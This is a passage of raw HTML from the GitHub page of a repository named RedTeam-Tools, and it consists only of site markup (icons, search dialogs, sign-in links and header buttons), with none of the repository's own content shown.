0 1 .75-.75h2.5a.75.75 0 0 1 .75.75v1.25h2.25a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM3.75 6h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5ZM3 3.75A.75.75 0 0 1 3.75 3h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 3.75Zm4 3A.75.75 0 0 1 7.75 6h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 7 6.75ZM7.75 3h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5ZM3 9.75A.75.75 0 0 1 3.75 9h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 9.75ZM7.75 9h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path> </svg> </template> <template id="rocket-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-rocket"> <path d="M14.064 0h.186C15.216 0 16 .784 16 1.75v.186a8.752 8.752 0 0 1-2.564 6.186l-.458.459c-.314.314-.641.616-.979.904v3.207c0 .608-.315 1.172-.833 1.49l-2.774 1.707a.749.749 0 0 1-1.11-.418l-.954-3.102a1.214 1.214 0 0 1-.145-.125L3.754 9.816a1.218 1.218 0 0 1-.124-.145L.528 8.717a.749.749 0 0 1-.418-1.11l1.71-2.774A1.748 1.748 0 0 1 3.31 4h3.204c.288-.338.59-.665.904-.979l.459-.458A8.749 8.749 0 0 1 14.064 0ZM8.938 3.623h-.002l-.458.458c-.76.76-1.437 1.598-2.02 2.5l-1.5 2.317 2.143 2.143 2.317-1.5c.902-.583 1.74-1.26 2.499-2.02l.459-.458a7.25 7.25 0 0 0 2.123-5.127V1.75a.25.25 0 0 0-.25-.25h-.186a7.249 7.249 0 0 0-5.125 2.123ZM3.56 14.56c-.732.732-2.334 1.045-3.005 1.148a.234.234 0 0 1-.201-.064.234.234 0 0 1-.064-.201c.103-.671.416-2.273 1.15-3.003a1.502 1.502 0 1 1 2.12 2.12Zm6.94-3.935c-.088.06-.177.118-.266.175l-2.35 1.521.548 1.783 1.949-1.2a.25.25 0 0 0 .119-.213ZM3.678 8.116 5.2 5.766c.058-.09.117-.178.176-.266H3.309a.25.25 0 0 0-.213.119l-1.2 1.95ZM12 5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> </template> <template id="shield-check-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield-check"> <path d="m8.533.133 5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667l5.25-1.68a1.748 1.748 0 0 1 1.066 0Zm-.61 1.429.001.001-5.25 1.68a.251.251 0 0 0-.174.237V7c0 1.36.275 2.666 1.057 3.859.784 1.194 2.121 2.342 4.366 3.298a.196.196 0 0 0 .154 0c2.245-.957 3.582-2.103 4.366-3.297C13.225 9.666 13.5 8.358 13.5 7V3.48a.25.25 0 0 0-.174-.238l-5.25-1.68a.25.25 0 0 0-.153 0ZM11.28 6.28l-3.5 3.5a.75.75 0 0 1-1.06 0l-1.5-1.5a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l.97.97 2.97-2.97a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </template> <template id="heart-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-heart"> <path d="m8 14.25.345.666a.75.75 0 0 1-.69 0l-.008-.004-.018-.01a7.152 7.152 0 0 1-.31-.17 22.055 22.055 0 0 1-3.434-2.414C2.045 10.731 0 8.35 0 5.5 0 2.836 2.086 1 4.25 1 5.797 1 7.153 1.802 8 3.02 8.847 1.802 10.203 1 11.75 1 13.914 1 16 2.836 16 5.5c0 2.85-2.045 5.231-3.885 6.818a22.066 22.066 0 0 1-3.744 2.584l-.018.01-.006.003h-.002ZM4.25 2.5c-1.336 0-2.75 1.164-2.75 3 0 2.15 1.58 4.144 3.365 5.682A20.58 20.58 0 0 0 8 13.393a20.58 20.58 0 0 0 3.135-2.211C12.92 9.644 14.5 7.65 14.5 5.5c0-1.836-1.414-3-2.75-3-1.373 0-2.609.986-3.029 2.456a.749.749 0 0 1-1.442 0C6.859 3.486 5.623 2.5 4.25 2.5Z"></path> </svg> </template> <template id="server-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-server"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v4c0 .372-.116.717-.314 1 .198.283.314.628.314 1v4a1.75 1.75 0 0 1-1.75 1.75H1.75A1.75 1.75 0 0 1 0 12.75v-4c0-.358.109-.707.314-1a1.739 1.739 0 0 1-.314-1v-4C0 1.784.784 1 1.75 1ZM1.5 2.75v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm.25 5.75a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25ZM7 4.75A.75.75 0 0 1 7.75 4h4.5a.75.75 0 0 1 0 1.5h-4.5A.75.75 0 0 1 7 4.75ZM7.75 10h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1 0-1.5ZM3 4.75A.75.75 0 0 1 3.75 4h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 4.75ZM3.75 10h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path> </svg> </template> <template id="globe-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-globe"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM5.78 8.75a9.64 9.64 0 0 0 1.363 4.177c.255.426.542.832.857 1.215.245-.296.551-.705.857-1.215A9.64 9.64 0 0 0 10.22 8.75Zm4.44-1.5a9.64 9.64 0 0 0-1.363-4.177c-.307-.51-.612-.919-.857-1.215a9.927 9.927 0 0 0-.857 1.215A9.64 9.64 0 0 0 5.78 7.25Zm-5.944 1.5H1.543a6.507 6.507 0 0 0 4.666 5.5c-.123-.181-.24-.365-.352-.552-.715-1.192-1.437-2.874-1.581-4.948Zm-2.733-1.5h2.733c.144-2.074.866-3.756 1.58-4.948.12-.197.237-.381.353-.552a6.507 6.507 0 0 0-4.666 5.5Zm10.181 1.5c-.144 2.074-.866 3.756-1.58 4.948-.12.197-.237.381-.353.552a6.507 6.507 0 0 0 4.666-5.5Zm2.733-1.5a6.507 6.507 0 0 0-4.666-5.5c.123.181.24.365.353.552.714 1.192 1.436 2.874 1.58 4.948Z"></path> </svg> </template> <template id="issue-opened-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> </template> <template id="device-mobile-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile"> <path d="M3.75 0h8.5C13.216 0 14 .784 14 1.75v12.5A1.75 1.75 0 0 1 12.25 16h-8.5A1.75 1.75 0 0 1 2 14.25V1.75C2 .784 2.784 0 3.75 0ZM3.5 1.75v12.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM8 13a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path> </svg> </template> <template id="package-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-package"> <path d="m8.878.392 5.25 3.045c.54.314.872.89.872 1.514v6.098a1.75 1.75 0 0 1-.872 1.514l-5.25 3.045a1.75 1.75 0 0 1-1.756 0l-5.25-3.045A1.75 1.75 0 0 1 1 11.049V4.951c0-.624.332-1.201.872-1.514L7.122.392a1.75 1.75 0 0 1 1.756 0ZM7.875 1.69l-4.63 2.685L8 7.133l4.755-2.758-4.63-2.685a.248.248 0 0 0-.25 0ZM2.5 5.677v5.372c0 .09.047.171.125.216l4.625 2.683V8.432Zm6.25 8.271 4.625-2.683a.25.25 0 0 0 .125-.216V5.677L8.75 8.432Z"></path> </svg> </template> <template id="credit-card-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-credit-card"> <path d="M10.75 9a.75.75 0 0 0 0 1.5h1.5a.75.75 0 0 0 0-1.5h-1.5Z"></path><path d="M0 3.75C0 2.784.784 2 1.75 2h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 14H1.75A1.75 1.75 0 0 1 0 12.25ZM14.5 6.5h-13v5.75c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25Zm0-2.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25V5h13Z"></path> </svg> </template> <template id="play-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> </template> <template id="gift-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-gift"> <path d="M2 2.75A2.75 2.75 0 0 1 4.75 0c.983 0 1.873.42 2.57 1.232.268.318.497.668.68 1.042.183-.375.411-.725.68-1.044C9.376.42 10.266 0 11.25 0a2.75 2.75 0 0 1 2.45 4h.55c.966 0 1.75.784 1.75 1.75v2c0 .698-.409 1.301-1 1.582v4.918A1.75 1.75 0 0 1 13.25 16H2.75A1.75 1.75 0 0 1 1 14.25V9.332C.409 9.05 0 8.448 0 7.75v-2C0 4.784.784 4 1.75 4h.55c-.192-.375-.3-.8-.3-1.25ZM7.25 9.5H2.5v4.75c0 .138.112.25.25.25h4.5Zm1.5 0v5h4.5a.25.25 0 0 0 .25-.25V9.5Zm0-4V8h5.5a.25.25 0 0 0 .25-.25v-2a.25.25 0 0 0-.25-.25Zm-7 0a.25.25 0 0 0-.25.25v2c0 .138.112.25.25.25h5.5V5.5h-5.5Zm3-4a1.25 1.25 0 0 0 0 2.5h2.309c-.233-.818-.542-1.401-.878-1.793-.43-.502-.915-.707-1.431-.707ZM8.941 4h2.309a1.25 1.25 0 0 0 0-2.5c-.516 0-1 .205-1.43.707-.337.392-.646.975-.879 1.793Z"></path> </svg> </template> <template id="code-square-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-square"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25Zm7.47 3.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L10.69 8 9.22 6.53a.75.75 0 0 1 0-1.06ZM6.78 6.53 5.31 8l1.47 1.47a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </template> <template id="device-desktop-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path d="M14.25 1c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 14.25 12h-3.727c.099 1.041.52 1.872 1.292 2.757A.752.752 0 0 1 11.25 16h-6.5a.75.75 0 0 1-.565-1.243c.772-.885 1.192-1.716 1.292-2.757H1.75A1.75 1.75 0 0 1 0 10.25v-7.5C0 1.784.784 1 1.75 1ZM1.75 2.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25ZM9.018 12H6.982a5.72 5.72 0 0 1-.765 2.5h3.566a5.72 5.72 0 0 1-.765-2.5Z"></path> </svg> </template> <div class="position-relative"> <ul role="listbox" class="ActionListWrap QueryBuilder-ListWrap" aria-label="Suggestions" data-action=" combobox-commit:query-builder#comboboxCommit mousedown:query-builder#resultsMousedown " data-target="query-builder.resultsList" data-persist-list=false id="query-builder-test-results" ></ul> </div> <div class="FormControl-inlineValidation" id="validation-77f461ac-c330-44a2-b211-22549c9c3559" hidden="hidden"> <span class="FormControl-inlineValidation--visual"> <svg aria-hidden="true" height="12" viewBox="0 0 12 12" version="1.1" width="12" data-view-component="true" class="octicon octicon-alert-fill"> <path d="M4.855.708c.5-.896 1.79-.896 2.29 0l4.675 8.351a1.312 1.312 0 0 1-1.146 1.954H1.33A1.313 1.313 0 0 1 .183 9.058ZM7 7V3H5v4Zm-1 3a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"></path> </svg> </span> <span></span> </div> </div> <div data-target="query-builder.screenReaderFeedback" aria-live="polite" aria-atomic="true" class="sr-only"></div> </query-builder></form> <div class="d-flex flex-row color-fg-muted px-3 text-small color-bg-default search-feedback-prompt"> <a target="_blank" href="https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax" data-view-component="true" class="Link color-fg-accent text-normal ml-2">Search syntax tips</a> <div class="d-flex flex-1"></div> </div> </div> </div> </div> </modal-dialog></div> </div> <div data-action="click:qbsearch-input#retract" class="dark-backdrop position-fixed" hidden data-target="qbsearch-input.darkBackdrop"></div> <div class="color-fg-default"> <dialog-helper> <dialog data-target="qbsearch-input.feedbackDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="feedback-dialog" aria-modal="true" aria-labelledby="feedback-dialog-title" aria-describedby="feedback-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade Overlay--disableScroll"> <div data-view-component="true" class="Overlay-header"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="feedback-dialog-title"> Provide feedback </h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="feedback-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </div> </div> </div> <scrollable-region data-labelled-by="feedback-dialog-title"> <div data-view-component="true" class="Overlay-body"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="code-search-feedback-form" data-turbo="false" action="/search/feedback" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="kxPaTgiKqw89Dbfx+aTK74VuZ8MhU1tRFzfAJIm8FyC5iivJH1VVBvbYMj6FT128nC1FDEZdrCgJ55A/obTLnQ==" /> <p>We read every piece of feedback, and take your input very seriously.</p> <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> <input name="include_email" id="include_email" aria-label="Include my email address so I can be contacted" class="form-control mr-2" type="checkbox"> <label for="include_email" style="font-weight: normal">Include my email address so I can be contacted</label> </form></div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="feedback-dialog" type="button" data-view-component="true" class="btn"> Cancel </button> <button form="code-search-feedback-form" data-action="click:qbsearch-input#submitFeedback" type="submit" data-view-component="true" class="btn-primary btn"> Submit feedback </button> </div> </dialog></dialog-helper> <custom-scopes data-target="qbsearch-input.customScopesManager"> <dialog-helper> <dialog data-target="custom-scopes.customScopesModalDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="custom-scopes-dialog" aria-modal="true" aria-labelledby="custom-scopes-dialog-title" aria-describedby="custom-scopes-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade Overlay--disableScroll"> <div data-view-component="true" class="Overlay-header Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="custom-scopes-dialog-title"> Saved searches </h1> <h2 id="custom-scopes-dialog-description" class="Overlay-description">Use saved searches to filter your results more quickly</h2> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="custom-scopes-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </div> </div> </div> <scrollable-region data-labelled-by="custom-scopes-dialog-title"> <div data-view-component="true" class="Overlay-body"> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <div hidden class="create-custom-scope-form" data-target="custom-scopes.createCustomScopeForm"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="custom-scopes-dialog-form" data-turbo="false" action="/search/custom_scopes" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="0XEwrb6edOhuwOuHEYnce55Qsqc5K/HqqENoB7sVGJqo7BbAKHW2llgvXqrrAYKEhyrXtps1Pt6rCccYwZEpSg==" /> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <input type="hidden" id="custom_scope_id" name="custom_scope_id" data-target="custom-scopes.customScopesIdField"> <div class="form-group"> <label for="custom_scope_name">Name</label> <auto-check src="/search/custom_scopes/check_name" required only-validate-on-blur="false"> <input type="text" name="custom_scope_name" id="custom_scope_name" data-target="custom-scopes.customScopesNameField" class="form-control" autocomplete="off" placeholder="github-ruby" required maxlength="50"> <input type="hidden" data-csrf="true" value="lY+g8RXZBBZFTknznMkfU0CqR/sdaxx556RIiYOw+IAZ4vvyZEfZ91NW/L5DIEV6EWymeWK/jxSh9mb8l9oXKw==" /> </auto-check> </div> <div class="form-group"> <label for="custom_scope_query">Query</label> <input type="text" name="custom_scope_query" id="custom_scope_query" data-target="custom-scopes.customScopesQueryField" class="form-control" autocomplete="off" placeholder="(repo:mona/a OR repo:mona/b) AND lang:python" required maxlength="500"> </div> <p class="text-small color-fg-muted"> To see all available qualifiers, see our <a class="Link--inTextBlock" href="https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax">documentation</a>. </p> </form> </div> <div data-target="custom-scopes.manageCustomScopesForm"> <div data-target="custom-scopes.list"></div> </div> </div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd Overlay-footer--divided"> <button data-action="click:custom-scopes#customScopesCancel" type="button" data-view-component="true" class="btn"> Cancel </button> <button form="custom-scopes-dialog-form" data-action="click:custom-scopes#customScopesSubmit" data-target="custom-scopes.customScopesSubmitButton" type="submit" data-view-component="true" class="btn-primary btn"> Create saved search </button> </div> </dialog></dialog-helper> </custom-scopes> </div> </qbsearch-input> <div class="position-relative HeaderMenu-link-wrap d-lg-inline-block"> <a href="/login?return_to=https%3A%2F%2Fgithub.com%2FA-poc%2FRedTeam-Tools" class="HeaderMenu-link HeaderMenu-link--sign-in HeaderMenu-button flex-shrink-0 no-underline d-none d-lg-inline-flex border border-lg-0 rounded rounded-lg-0 px-2 py-1" style="margin-left: 12px;" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"site header menu","repository_id":null,"auth_type":"SIGN_UP","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" data-hydro-click-hmac="e554e53a29a9ced4fac52fb8dc6438e79d769127444c682a0707c61465cad295" data-analytics-event="{"category":"Marketing nav","action":"click to go to homepage","label":"ref_page:Marketing;ref_cta:Sign in;ref_loc:Header"}" > Sign in </a> </div> <a href="/signup?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E&source=header-repo&source_repo=A-poc%2FRedTeam-Tools" class="HeaderMenu-link HeaderMenu-link--sign-up HeaderMenu-button flex-shrink-0 d-flex d-lg-inline-flex no-underline border color-border-default rounded px-2 py-1" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"site header menu","repository_id":null,"auth_type":"SIGN_UP","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" data-hydro-click-hmac="e554e53a29a9ced4fac52fb8dc6438e79d769127444c682a0707c61465cad295" data-analytics-event="{"category":"Sign up","action":"click to sign up for account","label":"ref_page:/<user-name>/<repo-name>;ref_cta:Sign up;ref_loc:header logged out"}" > Sign up </a> <button type="button" class="sr-only js-header-menu-focus-trap d-block d-lg-none">Reseting focus</button> </div> </div> </div> </div> </header> <div hidden="hidden" data-view-component="true" class="js-stale-session-flash stale-session-flash flash flash-warn flash-full"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-switched" hidden>You switched accounts on another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <button id="icon-button-5a40d7ce-16b0-46e9-85c5-e6142781bcc0" aria-labelledby="tooltip-1e43e560-9ce0-43fc-8e35-d9576f9f81ca" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium flash-close js-flash-close"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x Button-visual"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button><tool-tip id="tooltip-1e43e560-9ce0-43fc-8e35-d9576f9f81ca" for="icon-button-5a40d7ce-16b0-46e9-85c5-e6142781bcc0" popover="manual" data-direction="s" data-type="label" data-view-component="true" class="sr-only position-absolute">Dismiss alert</tool-tip> </div> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" class="flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div> </div> </template> </div> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled data-project-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--page-header-bgColor, var(--color-page-header-bg));" data-turbo-replace> <div class="d-flex flex-nowrap flex-justify-end mb-3 px-3 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path> </svg> <span class="author flex-self-stretch" itemprop="author"> <a class="url fn" rel="author" data-hovercard-type="user" data-hovercard-url="/users/A-poc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/A-poc"> A-poc </a> </span> <span class="mx-1 flex-self-stretch color-fg-muted">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" href="/A-poc/RedTeam-Tools">RedTeam-Tools</a> </strong> <span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span> </div> </div> <div id="repository-details-container" class="flex-shrink-0" data-turbo-replace style="max-width: 70%;"> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <a href="/login?return_to=%2FA-poc%2FRedTeam-Tools" rel="nofollow" id="repository-details-watch-button" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"notification subscription menu watch","repository_id":null,"auth_type":"LOG_IN","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" data-hydro-click-hmac="3730b16bad2c56778051dcd01bc9309f8763e8aa422cdf684b4fa8368a516313" aria-label="You must be signed in to change notification settings" data-view-component="true" class="btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path> </svg>Notifications </a> <tool-tip id="tooltip-6fd760ee-485e-4d82-a183-e330489379f6" for="repository-details-watch-button" popover="manual" data-direction="s" data-type="description" data-view-component="true" class="sr-only position-absolute">You must be signed in to change notification settings</tool-tip> </li> <li> <a icon="repo-forked" id="fork-button" href="/login?return_to=%2FA-poc%2FRedTeam-Tools" rel="nofollow" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"repo details fork button","repository_id":538444958,"auth_type":"LOG_IN","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" 